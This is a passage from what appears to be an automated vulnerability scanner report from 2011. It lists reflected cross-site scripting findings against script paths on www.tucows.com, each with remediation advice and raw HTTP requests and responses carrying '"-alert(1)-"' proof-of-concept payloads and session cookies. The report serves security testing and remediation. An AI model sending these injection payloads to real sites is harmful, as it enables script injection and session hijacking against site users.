Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesbe914"-alert(1)-"d7583b93b1f/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.274. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 254cc"-alert(1)-"7ef9881c0ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js254cc"-alert(1)-"7ef9881c0ed/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js254cc"-alert(1)-"7ef9881c0ed/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.275. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aae9e"-alert(1)-"0ee85bcbea6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/show_layer.jsaae9e"-alert(1)-"0ee85bcbea6 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/show_layer.jsaae9e"-alert(1)-"0ee85bcbea6";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.276. http://www.tucows.com/images/newassets/includes/js/show_layer.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38f6"-alert(1)-"339c2aebf39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/show_layer.js?b38f6"-alert(1)-"339c2aebf39=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/show_layer.js?b38f6"-alert(1)-"339c2aebf39=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.277. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b50"-alert(1)-"b444dbcbd88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesf3b50"-alert(1)-"b444dbcbd88/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesf3b50"-alert(1)-"b444dbcbd88/newassets/includes/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.278. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d53eb"-alert(1)-"62bf072695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsd53eb"-alert(1)-"62bf072695/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsd53eb"-alert(1)-"62bf072695/includes/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.279. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c81a"-alert(1)-"2b1a48bb558 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes3c81a"-alert(1)-"2b1a48bb558/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes3c81a"-alert(1)-"2b1a48bb558/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.280. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8017"-alert(1)-"b67c8ffcb4e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/jse8017"-alert(1)-"b67c8ffcb4e/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/jse8017"-alert(1)-"b67c8ffcb4e/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.281. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6806a"-alert(1)-"96913118ea0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/signupin.js6806a"-alert(1)-"96913118ea0 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/signupin.js6806a"-alert(1)-"96913118ea0";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.282. http://www.tucows.com/images/newassets/includes/js/signupin.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12dab"-alert(1)-"167442f74b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/signupin.js?12dab"-alert(1)-"167442f74b4=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/signupin.js?12dab"-alert(1)-"167442f74b4=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.283. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e30d"-alert(1)-"7ba0537e045 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images8e30d"-alert(1)-"7ba0537e045/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images8e30d"-alert(1)-"7ba0537e045/newassets/includes/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.284. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 189cd"-alert(1)-"ae1dffd01f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets189cd"-alert(1)-"ae1dffd01f2/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
